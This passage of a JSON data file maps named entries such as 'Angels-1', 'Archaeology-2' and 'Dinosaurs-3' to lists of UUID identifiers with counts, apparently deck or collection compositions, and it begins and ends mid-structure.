"id": "cce6289e-f665-4faa-8285-c843447f3e52",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "dee1d595-a998-4652-931f-a1a72446f3a6",
"count": 1
},
{
"id": "6ac0f66a-213f-463e-8ebb-35ff5940ea06",
"count": 1
},
{
"id": "8c58807d-1663-486a-ac94-627a8677f2b3",
"count": 1
},
{
"id": "d0346326-6bdf-4385-ab41-7b06e9f66ffd",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "64832674-beb1-446e-b2f7-8a5e271139a5",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "6a3c7c06-76e4-487d-a63f-4aed3bbb4638",
"count": 8
}
],
"Above the Clouds-4": [
{
"id": "cce6289e-f665-4faa-8285-c843447f3e52",
"count": 1
},
{
"id": "437ded6e-4e53-49fa-a5ca-fd76b9165a47",
"count": 1
},
{
"id": "d961c441-b76b-4bd8-b510-a3e073207a1b",
"count": 1
},
{
"id": "8cbac0e4-f79f-476d-b410-d19ab3696606",
"count": 1
},
{
"id": "dee1d595-a998-4652-931f-a1a72446f3a6",
"count": 1
},
{
"id": "6ac0f66a-213f-463e-8ebb-35ff5940ea06",
"count": 1
},
{
"id": "82ff4bd1-2b61-46be-b547-38916ea08298",
"count": 1
},
{
"id": "64832674-beb1-446e-b2f7-8a5e271139a5",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "b19de7a5-c291-405b-a2e6-8d3ac56e6570",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "6a3c7c06-76e4-487d-a63f-4aed3bbb4638",
"count": 7
}
],
"Angels-1": [
{
"id": "ddf5db14-f2aa-4088-9894-7bd3a56dfe1e",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "0b0974b4-b306-4026-b0a8-22bd9da3e384",
"count": 1
},
{
"id": "9b2a972a-a953-485d-920d-8f4f978ef758",
"count": 1
},
{
"id": "9067f035-3437-4c5c-bae9-d3c9001a3411",
"count": 1
},
{
"id": "30a78066-c52e-48fd-bcf9-d0b60f00fddc",
"count": 1
},
{
"id": "e8cca776-b0e4-4cd2-815f-36c1f86cf497",
"count": 1
},
{
"id": "73148b3b-73d3-4f57-8b67-1e91fbe112b9",
"count": 1
},
{
"id": "f14ed7f7-83c4-425b-a2b7-5bd76558ce76",
"count": 1
},
{
"id": "393ef742-6968-4266-ae07-a4564b7f6ede",
"count": 1
},
{
"id": "2a2d0981-0af6-42d6-b926-16f8f2327320",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "75c3424f-0500-48ce-9779-b77e7763e253",
"count": 7
}
],
"Angels-2": [
{
"id": "8637d263-5d7e-45bc-aad3-d97f57e6898e",
"count": 1
},
{
"id": "ddf5db14-f2aa-4088-9894-7bd3a56dfe1e",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "9b2a972a-a953-485d-920d-8f4f978ef758",
"count": 1
},
{
"id": "dded98c3-17cb-4a43-a209-289ceb11df39",
"count": 1
},
{
"id": "9067f035-3437-4c5c-bae9-d3c9001a3411",
"count": 1
},
{
"id": "e8cca776-b0e4-4cd2-815f-36c1f86cf497",
"count": 1
},
{
"id": "457eb507-bbbf-4064-bdb0-cfeefe2195df",
"count": 1
},
{
"id": "f14ed7f7-83c4-425b-a2b7-5bd76558ce76",
"count": 1
},
{
"id": "393ef742-6968-4266-ae07-a4564b7f6ede",
"count": 1
},
{
"id": "2a2d0981-0af6-42d6-b926-16f8f2327320",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "75c3424f-0500-48ce-9779-b77e7763e253",
"count": 7
}
],
"Archaeology-1": [
{
"id": "8d4113be-6dd9-4c15-9f57-a146bc520df8",
"count": 1
},
{
"id": "22bb8779-ac19-43d6-b818-86eb8ee2f87d",
"count": 2
},
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "dcc90cf8-9dd6-4dac-8cbb-21677d81e4d3",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "a9a086bf-19d2-4827-af2c-a6f57d640782",
"count": 1
},
{
"id": "aa254a86-3c30-408d-9c14-befd472f9740",
"count": 1
},
{
"id": "52e40cb2-d306-4c8d-859b-ac288e9dc78d",
"count": 1
},
{
"id": "a54e8ce9-edd7-4ae7-9521-6fb6727cf63b",
"count": 1
},
{
"id": "edabc8b2-4413-48e4-8d6f-521b19d839a6",
"count": 1
},
{
"id": "c5112871-dd07-4257-9a11-a86523c4a8b6",
"count": 1
},
{
"id": "011bc5b7-c4d5-4c4c-af0d-aa0853d63f3a",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "5c7f7338-8edc-4579-b92f-86b02527682c",
"count": 6
}
],
"Archaeology-2": [
{
"id": "8d4113be-6dd9-4c15-9f57-a146bc520df8",
"count": 1
},
{
"id": "22bb8779-ac19-43d6-b818-86eb8ee2f87d",
"count": 2
},
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "dcc90cf8-9dd6-4dac-8cbb-21677d81e4d3",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "a9a086bf-19d2-4827-af2c-a6f57d640782",
"count": 1
},
{
"id": "aa254a86-3c30-408d-9c14-befd472f9740",
"count": 1
},
{
"id": "52e40cb2-d306-4c8d-859b-ac288e9dc78d",
"count": 1
},
{
"id": "a54e8ce9-edd7-4ae7-9521-6fb6727cf63b",
"count": 1
},
{
"id": "58382d72-9b2b-44cf-8a02-b745deafc286",
"count": 1
},
{
"id": "48eda056-e00f-4e28-ad26-9150a4704d21",
"count": 1
},
{
"id": "011bc5b7-c4d5-4c4c-af0d-aa0853d63f3a",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "5c7f7338-8edc-4579-b92f-86b02527682c",
"count": 6
}
],
"Archaeology-3": [
{
"id": "8d4113be-6dd9-4c15-9f57-a146bc520df8",
"count": 1
},
{
"id": "22bb8779-ac19-43d6-b818-86eb8ee2f87d",
"count": 2
},
{
"id": "dcc90cf8-9dd6-4dac-8cbb-21677d81e4d3",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "a9a086bf-19d2-4827-af2c-a6f57d640782",
"count": 1
},
{
"id": "eedce8ab-771a-4247-9504-72ae0629df83",
"count": 1
},
{
"id": "4df1ce35-1f1c-40ab-8e4d-cb087b4656d8",
"count": 1
},
{
"id": "508b3cb7-b434-4524-8ef0-7db7f7f22edd",
"count": 1
},
{
"id": "52e40cb2-d306-4c8d-859b-ac288e9dc78d",
"count": 1
},
{
"id": "a54e8ce9-edd7-4ae7-9521-6fb6727cf63b",
"count": 1
},
{
"id": "c5112871-dd07-4257-9a11-a86523c4a8b6",
"count": 1
},
{
"id": "011bc5b7-c4d5-4c4c-af0d-aa0853d63f3a",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "5c7f7338-8edc-4579-b92f-86b02527682c",
"count": 6
}
],
"Archaeology-4": [
{
"id": "22bb8779-ac19-43d6-b818-86eb8ee2f87d",
"count": 2
},
{
"id": "3d0c95b0-7b63-40e8-92ad-5ae5ffd3c4c1",
"count": 1
},
{
"id": "dcc90cf8-9dd6-4dac-8cbb-21677d81e4d3",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "a9a086bf-19d2-4827-af2c-a6f57d640782",
"count": 1
},
{
"id": "a8c9d86a-54a3-457c-b9b4-61f914de6e14",
"count": 1
},
{
"id": "5fbd8e7c-13cb-4aea-a3cb-c7ed29d43163",
"count": 1
},
{
"id": "e77f544c-1d27-4632-8ca5-7dfb38f42b1c",
"count": 1
},
{
"id": "52e40cb2-d306-4c8d-859b-ac288e9dc78d",
"count": 1
},
{
"id": "a54e8ce9-edd7-4ae7-9521-6fb6727cf63b",
"count": 1
},
{
"id": "973c166e-3e93-4ed5-b4c5-84dc158a8e4f",
"count": 1
},
{
"id": "011bc5b7-c4d5-4c4c-af0d-aa0853d63f3a",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "5c7f7338-8edc-4579-b92f-86b02527682c",
"count": 6
}
],
"Basri": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "74b1eae0-1bf8-4922-a9e3-45c01ece9005",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "2f81d2a0-5301-4cae-ac83-ad51647146e3",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "db17f25a-32d1-469b-bb5f-f1761e227990",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "98c85699-2daf-4e87-a3be-465d02bd64bb",
"count": 1
},
{
"id": "73148b3b-73d3-4f57-8b67-1e91fbe112b9",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2f6778ff-6c1c-498a-bbfa-46c35b77a72a",
"count": 7
}
],
"Cats-1": [
{
"id": "a3f6a13a-ab38-49d1-8712-f9c9135a23c8",
"count": 1
},
{
"id": "fbea5a3c-03b7-44da-b8f7-534a962b8e1e",
"count": 1
},
{
"id": "a59d92b0-5ad1-42a7-9c06-1cb31a63bd64",
"count": 1
},
{
"id": "380e83c1-e5e3-49b2-bbf3-fad8cc7d020a",
"count": 1
},
{
"id": "3c21c795-e455-4ecf-a7a2-8f204c114c81",
"count": 1
},
{
"id": "73f5156b-b200-41f7-8b93-557c4cdc2bf7",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "8b9f4647-4214-4f11-8995-72e149592e2f",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "190ad379-1a0f-4598-b5b1-453955846597",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "ea556a69-c487-45ca-8f60-7e89407ec7b7",
"count": 7
}
],
"Cats-2": [
{
"id": "a3f6a13a-ab38-49d1-8712-f9c9135a23c8",
"count": 1
},
{
"id": "fbea5a3c-03b7-44da-b8f7-534a962b8e1e",
"count": 1
},
{
"id": "a59d92b0-5ad1-42a7-9c06-1cb31a63bd64",
"count": 1
},
{
"id": "380e83c1-e5e3-49b2-bbf3-fad8cc7d020a",
"count": 1
},
{
"id": "3c21c795-e455-4ecf-a7a2-8f204c114c81",
"count": 1
},
{
"id": "496cce86-ff61-4d24-8d37-8c27acaff21c",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "8b9f4647-4214-4f11-8995-72e149592e2f",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "190ad379-1a0f-4598-b5b1-453955846597",
"count": 1
},
{
"id": "9952da7c-3cfc-413f-8849-0f10e9c8dceb",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "ea556a69-c487-45ca-8f60-7e89407ec7b7",
"count": 7
}
],
"Chandra": [
{
"id": "ed875705-b7b6-4464-b16f-61629ffed04f",
"count": 1
},
{
"id": "91d3e366-4da5-42c8-bbd5-a0c178c0da28",
"count": 2
},
{
"id": "e7744fcf-2336-489d-bc05-f3fce78713a9",
"count": 1
},
{
"id": "05469d01-0d2b-47b9-8a69-16cf0c3d43f8",
"count": 1
},
{
"id": "15148b4e-19e2-4e39-8e6f-1dc94ea03463",
"count": 1
},
{
"id": "218af707-cc60-407e-af20-e21879a0e902",
"count": 1
},
{
"id": "a4c3ca8c-c77c-43b8-84ad-796313ecc813",
"count": 1
},
{
"id": "07392a36-e63a-4648-b8df-1172403922eb",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "584cdb52-08f8-425b-8407-8192b1dc6843",
"count": 1
},
{
"id": "ffdb47a8-130b-4ca9-ad29-9484b5c0c582",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "0162885d-3f55-4440-b40d-e38d378c4567",
"count": 7
}
],
"Devilish-1": [
{
"id": "1d4e5c23-3a7f-4a6b-99c4-6a1487a9b097",
"count": 1
},
{
"id": "bd7308e6-4303-4f01-928b-f154b376e1a5",
"count": 1
},
{
"id": "386e5cb2-39c8-453d-a642-c5d9f8495601",
"count": 1
},
{
"id": "4bfffc18-b36a-4dd5-909e-60ea9f8eb60b",
"count": 1
},
{
"id": "fbd306cf-6625-4414-b9e5-4b909bb1bb13",
"count": 1
},
{
"id": "d59ee7a6-3dfa-44c7-8f00-0183137c4d31",
"count": 1
},
{
"id": "60c3aa66-2436-40a3-a541-185f457bd55a",
"count": 1
},
{
"id": "3d94b4c3-7944-41b6-8c92-78fd6e50658d",
"count": 1
},
{
"id": "81232b04-a4a0-48d8-b8af-a6e3d50173e5",
"count": 1
},
{
"id": "9189fafa-f30f-49a1-b07d-e432640d2bc5",
"count": 1
},
{
"id": "af482a14-a144-4e60-bd04-a548a3c89f5a",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "a92c5c74-d5b5-40bf-be86-39ac5e4c4f1a",
"count": 7
}
],
"Devilish-2": [
{
"id": "1d4e5c23-3a7f-4a6b-99c4-6a1487a9b097",
"count": 1
},
{
"id": "386e5cb2-39c8-453d-a642-c5d9f8495601",
"count": 1
},
{
"id": "4bfffc18-b36a-4dd5-909e-60ea9f8eb60b",
"count": 1
},
{
"id": "fbd306cf-6625-4414-b9e5-4b909bb1bb13",
"count": 1
},
{
"id": "d59ee7a6-3dfa-44c7-8f00-0183137c4d31",
"count": 1
},
{
"id": "2947ad7e-d365-45ff-b107-35819b308f8c",
"count": 1
},
{
"id": "60c3aa66-2436-40a3-a541-185f457bd55a",
"count": 2
},
{
"id": "3d94b4c3-7944-41b6-8c92-78fd6e50658d",
"count": 1
},
{
"id": "81232b04-a4a0-48d8-b8af-a6e3d50173e5",
"count": 1
},
{
"id": "af482a14-a144-4e60-bd04-a548a3c89f5a",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "a92c5c74-d5b5-40bf-be86-39ac5e4c4f1a",
"count": 7
}
],
"Devilish-3": [
{
"id": "5ea0d236-bfd2-4f47-8592-2669834d01f1",
"count": 1
},
{
"id": "1d4e5c23-3a7f-4a6b-99c4-6a1487a9b097",
"count": 1
},
{
"id": "386e5cb2-39c8-453d-a642-c5d9f8495601",
"count": 1
},
{
"id": "4bfffc18-b36a-4dd5-909e-60ea9f8eb60b",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "fbd306cf-6625-4414-b9e5-4b909bb1bb13",
"count": 1
},
{
"id": "d59ee7a6-3dfa-44c7-8f00-0183137c4d31",
"count": 1
},
{
"id": "60c3aa66-2436-40a3-a541-185f457bd55a",
"count": 1
},
{
"id": "81232b04-a4a0-48d8-b8af-a6e3d50173e5",
"count": 1
},
{
"id": "9189fafa-f30f-49a1-b07d-e432640d2bc5",
"count": 1
},
{
"id": "78fec7e6-5ed9-46dc-93b4-7a054d763403",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "a92c5c74-d5b5-40bf-be86-39ac5e4c4f1a",
"count": 7
}
],
"Devilish-4": [
{
"id": "1d4e5c23-3a7f-4a6b-99c4-6a1487a9b097",
"count": 1
},
{
"id": "386e5cb2-39c8-453d-a642-c5d9f8495601",
"count": 1
},
{
"id": "7bbfd905-8c71-4389-9174-6e84bcbcf05c",
"count": 1
},
{
"id": "4bfffc18-b36a-4dd5-909e-60ea9f8eb60b",
"count": 1
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "fbd306cf-6625-4414-b9e5-4b909bb1bb13",
"count": 1
},
{
"id": "db89172e-0542-4858-9e65-38b1bac8cdeb",
"count": 1
},
{
"id": "d59ee7a6-3dfa-44c7-8f00-0183137c4d31",
"count": 1
},
{
"id": "81232b04-a4a0-48d8-b8af-a6e3d50173e5",
"count": 1
},
{
"id": "78fec7e6-5ed9-46dc-93b4-7a054d763403",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "8b94ff00-0821-4743-b693-2ba310466306",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "a92c5c74-d5b5-40bf-be86-39ac5e4c4f1a",
"count": 7
}
],
"Dinosaurs-1": [
{
"id": "8059c52b-5d25-4052-b48a-e9e219a7a546",
"count": 1
},
{
"id": "68f1d2e6-ffa4-4c4e-8179-671deb9f5a7f",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "8c342309-aef7-4733-ac1c-ff0b704539a7",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "c2c4a0e7-9ca4-4291-94de-165cc2ded822",
"count": 1
},
{
"id": "c6cf27a3-9bcf-475c-a324-7c3af50496dd",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "f66d2ddc-b4d4-4387-bde0-16d81ef2b1a7",
"count": 1
},
{
"id": "31233339-c5ec-40fb-badd-94ef7f0ff7c0",
"count": 1
},
{
"id": "abdf15ef-91e9-433f-a4c8-e670adef904c",
"count": 1
},
{
"id": "1947f64a-5ca0-4dda-8bbd-8472e72ecf18",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "c2b534b1-2d78-4de3-afc8-8bdd6ee6da82",
"count": 7
}
],
"Dinosaurs-2": [
{
"id": "8059c52b-5d25-4052-b48a-e9e219a7a546",
"count": 1
},
{
"id": "68f1d2e6-ffa4-4c4e-8179-671deb9f5a7f",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "8c342309-aef7-4733-ac1c-ff0b704539a7",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "c2c4a0e7-9ca4-4291-94de-165cc2ded822",
"count": 1
},
{
"id": "a2e40ded-6daf-423e-8d74-2c6d448e0853",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "6da62557-9783-4e6c-9b5f-2b77dbf96909",
"count": 1
},
{
"id": "f66d2ddc-b4d4-4387-bde0-16d81ef2b1a7",
"count": 1
},
{
"id": "31233339-c5ec-40fb-badd-94ef7f0ff7c0",
"count": 1
},
{
"id": "abdf15ef-91e9-433f-a4c8-e670adef904c",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "c2b534b1-2d78-4de3-afc8-8bdd6ee6da82",
"count": 7
}
],
"Dinosaurs-3": [
{
"id": "8059c52b-5d25-4052-b48a-e9e219a7a546",
"count": 1
},
{
"id": "68f1d2e6-ffa4-4c4e-8179-671deb9f5a7f",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "c2c4a0e7-9ca4-4291-94de-165cc2ded822",
"count": 1
},
{
"id": "fb87782d-e9c7-440b-bd96-aa043d18e185",
"count": 1
},
{
"id": "a2e40ded-6daf-423e-8d74-2c6d448e0853",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "f66d2ddc-b4d4-4387-bde0-16d81ef2b1a7",
"count": 1
},
{
"id": "abdf15ef-91e9-433f-a4c8-e670adef904c",
"count": 1
},
{
"id": "71a4860a-8bb6-45c0-b00a-b4a42da33ab9",
"count": 1
},
{
"id": "f7df29a3-c40f-4cd8-a6fe-c1b95085cfed",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "c2b534b1-2d78-4de3-afc8-8bdd6ee6da82",
"count": 7
}
],
"Dinosaurs-4": [
{
"id": "8059c52b-5d25-4052-b48a-e9e219a7a546",
"count": 1
},
{
"id": "68f1d2e6-ffa4-4c4e-8179-671deb9f5a7f",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "c2c4a0e7-9ca4-4291-94de-165cc2ded822",
"count": 1
},
{
"id": "18d9a1e7-fe87-40e0-bff9-a1fa84b3b949",
"count": 1
},
{
"id": "c6cf27a3-9bcf-475c-a324-7c3af50496dd",
"count": 1
},
{
"id": "f66d2ddc-b4d4-4387-bde0-16d81ef2b1a7",
"count": 1
},
{
"id": "dffcaab7-674b-4e34-b09d-41414bd0022e",
"count": 1
},
{
"id": "abdf15ef-91e9-433f-a4c8-e670adef904c",
"count": 1
},
{
"id": "71a4860a-8bb6-45c0-b00a-b4a42da33ab9",
"count": 1
},
{
"id": "f7df29a3-c40f-4cd8-a6fe-c1b95085cfed",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "c2b534b1-2d78-4de3-afc8-8bdd6ee6da82",
"count": 7
}
],
"Discarding-1": [
{
"id": "cb457c05-2a60-437a-8138-cfd581b22996",
"count": 1
},
{
"id": "e39498cd-9b44-4563-b0fd-9258a52a85b2",
"count": 1
},
{
"id": "90c4b3bb-90b1-4241-a9ca-fdd7a0e0f0ac",
"count": 1
},
{
"id": "86eb76e0-11ed-4f89-a2f4-04bc67f3c94d",
"count": 1
},
{
"id": "40d3e58e-f989-4169-9e2c-a66a23170dcf",
"count": 1
},
{
"id": "d683abb8-46b4-424e-8a10-325519477419",
"count": 1
},
{
"id": "4063be5b-bfd9-43c5-bc39-09a40bc793bf",
"count": 1
},
{
"id": "32aec0ec-0feb-4276-ab9c-5bb18b5005a0",
"count": 2
},
{
"id": "9aacb3ae-c889-4912-bc2d-2aa0adfd20bd",
"count": 1
},
{
"id": "833a8604-92d5-443b-9bc0-bd91c973ef07",
"count": 1
},
{
"id": "f954e983-397c-4fdc-a6a1-142d03bfec7e",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "9a189653-dc0b-4b04-9544-5314cebf23fd",
"count": 7
}
],
"Discarding-2": [
{
"id": "cb457c05-2a60-437a-8138-cfd581b22996",
"count": 1
},
{
"id": "e39498cd-9b44-4563-b0fd-9258a52a85b2",
"count": 1
},
{
"id": "90c4b3bb-90b1-4241-a9ca-fdd7a0e0f0ac",
"count": 1
},
{
"id": "fa9396f3-a93c-47ee-91da-78af864c86c3",
"count": 1
},
{
"id": "a9843f26-83ed-4517-8ad6-0e288833d140",
"count": 1
},
{
"id": "86eb76e0-11ed-4f89-a2f4-04bc67f3c94d",
"count": 1
},
{
"id": "40d3e58e-f989-4169-9e2c-a66a23170dcf",
"count": 1
},
{
"id": "d683abb8-46b4-424e-8a10-325519477419",
"count": 1
},
{
"id": "32aec0ec-0feb-4276-ab9c-5bb18b5005a0",
"count": 2
},
{
"id": "9aacb3ae-c889-4912-bc2d-2aa0adfd20bd",
"count": 1
},
{
"id": "f954e983-397c-4fdc-a6a1-142d03bfec7e",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "9a189653-dc0b-4b04-9544-5314cebf23fd",
"count": 7
}
],
"Doctor-1": [
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "e321bbb0-1660-4452-a9b7-d41674f7f743",
"count": 1
},
{
"id": "e300294d-0bbd-4d28-b2bd-c5a976de212a",
"count": 1
},
{
"id": "a3bd4bce-8ab0-40b9-aad7-7d57a011bb0b",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "457eb507-bbbf-4064-bdb0-cfeefe2195df",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "6ea1ee60-5644-4f78-913d-32c36065957f",
"count": 1
},
{
"id": "d5f80411-0a95-4e0a-b7a8-af23ddf385cc",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2bcd008d-446e-41ba-a92e-871b9296fead",
"count": 7
}
],
"Doctor-2": [
{
"id": "2d22fdde-5590-4a4c-af2e-09711f4b5ffd",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "e300294d-0bbd-4d28-b2bd-c5a976de212a",
"count": 1
},
{
"id": "5cd3287d-e4d8-4670-a2dd-b683055ae4b9",
"count": 1
},
{
"id": "b17da4d0-f9fd-43af-85fc-ede9fa3962bf",
"count": 1
},
{
"id": "a3bd4bce-8ab0-40b9-aad7-7d57a011bb0b",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "6ea1ee60-5644-4f78-913d-32c36065957f",
"count": 1
},
{
"id": "d5f80411-0a95-4e0a-b7a8-af23ddf385cc",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2bcd008d-446e-41ba-a92e-871b9296fead",
"count": 7
}
],
"Doctor-3": [
{
"id": "2d22fdde-5590-4a4c-af2e-09711f4b5ffd",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "e321bbb0-1660-4452-a9b7-d41674f7f743",
"count": 1
},
{
"id": "62498e3c-2e9b-4444-a61c-fae3f8906010",
"count": 1
},
{
"id": "b17da4d0-f9fd-43af-85fc-ede9fa3962bf",
"count": 1
},
{
"id": "a3bd4bce-8ab0-40b9-aad7-7d57a011bb0b",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "6ea1ee60-5644-4f78-913d-32c36065957f",
"count": 1
},
{
"id": "d5f80411-0a95-4e0a-b7a8-af23ddf385cc",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2bcd008d-446e-41ba-a92e-871b9296fead",
"count": 7
}
],
"Doctor-4": [
{
"id": "b7026ffb-98de-4da7-84a8-1198639873f4",
"count": 1
},
{
